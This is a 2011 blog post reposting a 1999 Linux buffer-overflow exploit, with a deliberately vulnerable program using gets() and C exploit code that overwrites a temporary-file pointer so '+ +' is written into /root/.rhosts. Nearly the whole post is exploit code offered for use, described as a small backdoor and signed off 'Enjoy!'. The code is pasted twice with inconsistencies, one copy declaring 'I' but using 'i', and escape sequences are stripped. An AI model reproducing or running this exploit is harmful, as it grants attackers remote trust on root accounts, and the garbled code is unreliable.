Help pay for xds lawyer fees.
LR

Linux tmpfile-rhosts() exploit Info/PoC Code (.c)

Posted on 18th October 2011 in Codes, Exploits

Here is a rather interesting exploit, based on bugs in tmpfile and rhosts, verymuch still not used much but, could be contructed to work very easily thru a netcat like session… i wont go into that but, i will post the exploit
code wich is kinda like a small backdoor, i dunno, you be the judge here… it shuld be called temp rhosts() bug but, it seems abit trivial to exploit so ill leave it upto you for the name!

// MAIN exploit.c file..READ the notes as it shows you how
// to use this properly!! :?
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>

#define ERROR -1
#define BUFSIZE 16
/*
* Run this vulprog as root or change the "vulfile" to something else.
* Otherwise, even if the exploit works, it won't have permission to
* overwrite /root/.rhosts (the default "example").
*/
int main(int argc, char **argv) {
FILE *tmpfd;
static char buf[BUFSIZE], *tmpfile;
if (argc <= 1) {
fprintf(stderr, "Usage: %s <garbage>n", argv[0]);
exit(ERROR);
}
tmpfile = "/tmp/vulprog.tmp"; /* no, this is not a tempfile vul */
printf("before: tmpfile = %sn", tmpfile);
printf("Enter one line of data to put in %s: ", tmpfile);
gets(buf);
printf("nafter: tmpfile = %sn", tmpfile);
tmpfd = fopen(tmpfile, "w");
if (tmpfd == NULL) {
fprintf(stderr, "error opening %s: %sn", tmpfile,
strerror(errno));
exit(ERROR);
}
fputs(buf, tmpfd);
fclose(tmpfd);
}

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>

#define ERROR -1
#define BUFSIZE 16

int main(int argc, char **argv) {
FILE *tmpfd;
static char buf[BUFSIZE], *tmpfile;
if (argc <= 1) {
fprintf(stderr, "Usage: %s <garbage>n", argv[0]);
exit(ERROR);
}
tmpfile = "/tmp/vulprog.tmp"; /* no, this is not a tempfile vuln */
printf("before: tmpfile = %sn", tmpfile);
printf("Enter one line of data to put in %s: ", tmpfile);
gets(buf);
printf("nafter: tmpfile = %sn", tmpfile);
tmpfd = fopen(tmpfile, "w");
if (tmpfd == NULL) {
fprintf(stderr, "- error opening %s: %sn", tmpfile,
strerror(errno));
exit(ERROR);
}
fputs(buf, tmpfd);
fclose(tmpfd);
}

/*
* Copyright (C) January 1999, Matt Conover & WSD
*
* This will exploit vulprog1.c. It passes some arguments to the
* program (that the vulnerable program doesn't use). The vulnerable
* program expects us to enter one line of input to be stored
* temporarily. However, because of a static buffer overflow, we can
* overwrite the temporary filename pointer, to have it point to
* argv[1] (which we could pass as "/root/.rhosts"). Then it will
* write our temporary line to this file. So our overflow string (what
* we pass as our input line) will be:
* + + # (tmpfile addr) - (buf addr) # of A's | argv[1] address
*
* We use "+ +" (all hosts), followed by '#' (comment indicator), to
* prevent our "attack code" from causing problems. Without the
* "#", programs using .rhosts would misinterpret our attack code.
*
* Compile as: gcc -o exploit1 exploit1.c
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#define BUFSIZE 256
#define DIFF 16 /* estimated diff between buf/tmpfile in vulprog */
#define VULPROG "./vulprog1"
#define VULFILE "/root/.rhosts" /* the file 'buf' will be stored in */

/* get value of sp off the stack (used to calculate argv[1] address) */
u_long getesp() {
__asm__("movl %esp,%eax"); /* equiv. of 'return esp;' in C */
}

int main(int argc, char **argv) {
u_long addr;
register int i;
int mainbufsize;
char *mainbuf, buf[DIFF+6+1] = "+ +t# ";
if (argc <= 1) {
fprintf(stderr,"Usage: %s <offset> [try 310-330]n",argv[0]);
exit(ERROR);
}
memset(buf, 0, sizeof(buf)), strcpy(buf, "+ +t# ");
memset(buf + strlen(buf), 'A', DIFF);
addr = getesp() + atoi(argv[1]);
for (i = 0; i < sizeof(u_long); i++)
buf[DIFF + i] = ((u_long)addr >> (i * 8) & 255);
mainbufsize = strlen(buf) + strlen(VULPROG) + strlen(VULPROG) + strlen(VULFILE) + 13;
mainbuf = (char *)malloc(mainbufsize);
memset(mainbuf, 0, sizeof(mainbuf));
snprintf(mainbuf, mainbufsize - 1, "echo '%s' | %s %sn",buf, VULPROG, VULFILE);
printf("[+] Overflowing tmpaddr to point to %p, check %s after.nn",addr, VULFILE);
system(mainbuf);
return 0;
}

/*
* Copyright (C) January 1999, Matt Conover & WSD
*
* This will exploit vulprog1.c. It passes some arguments to the
* program (that the vulnerable program doesn't use). The vulnerable
* program expects us to enter one line of input to be stored
* temporarily. However, because of a static buffer overflow, we can
* overwrite the temporary filename pointer, to have it point to
* argv[1] (which we could pass as "/root/.rhosts"). Then it will
* write our temporary line to this file. So our overflow string (what
* we pass as our input line) will be:
* + + # (tmpfile addr) - (buf addr) # of A's | argv[1] address
*
* We use "+ +" (all hosts), followed by '#' (comment indicator), to
* prevent our "attack code" from causing problems. Without the
* "#", programs using .rhosts would misinterpret our attack code.
*
* Compile as: gcc -o exploit1 exploit1.c
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#define BUFSIZE 256
#define DIFF 16 /* estimated diff between buf/tmpfile in vulprog */
#define VULPROG "./vulprog1"
#define VULFILE "/root/.rhosts" /* the file 'buf' will be stored in */

/* get value of sp off the stack (used to calculate argv[1] address) */
u_long getesp() {
__asm__("movl %esp,%eax"); /* equiv. of 'return esp;' in C */
}

int main(int argc, char **argv) {
u_long addr;
register int I;
int mainbufsize;
char *mainbuf, buf[DIFF+6+1] = "+ +t# ";
if (argc <= 1) {
fprintf(stderr, "Usage: %s <offset> [try 310-330]n", argv[0]);
exit(ERROR);
}
memset(buf, 0, sizeof(buf)), strcpy(buf, "+ +t# ");
memset(buf + strlen(buf), 'A', DIFF);
addr = getesp() + atoi(argv[1]);
/* reverse byte order (on a little endian system) */
for (i = 0; i < sizeof(u_long); i++)
buf[DIFF + i] = ((u_long)addr >> (i * 8) & 255);
mainbufsize = strlen(buf) + strlen(VULPROG) + strlen(VULPROG) + strlen(VULFILE) + 13;
mainbuf = (char *)malloc(mainbufsize);
memset(mainbuf, 0, sizeof(mainbuf));
snprintf(mainbuf, mainbufsize - 1, "echo '%s' | %s %sn",buf, VULPROG, VULFILE);
printf("Overflowing tmpaddr to point to %p, check %s after.nn",addr, VULFILE);
system(mainbuf);
return 0;
}

Enjoy!

comments: 0 » tags: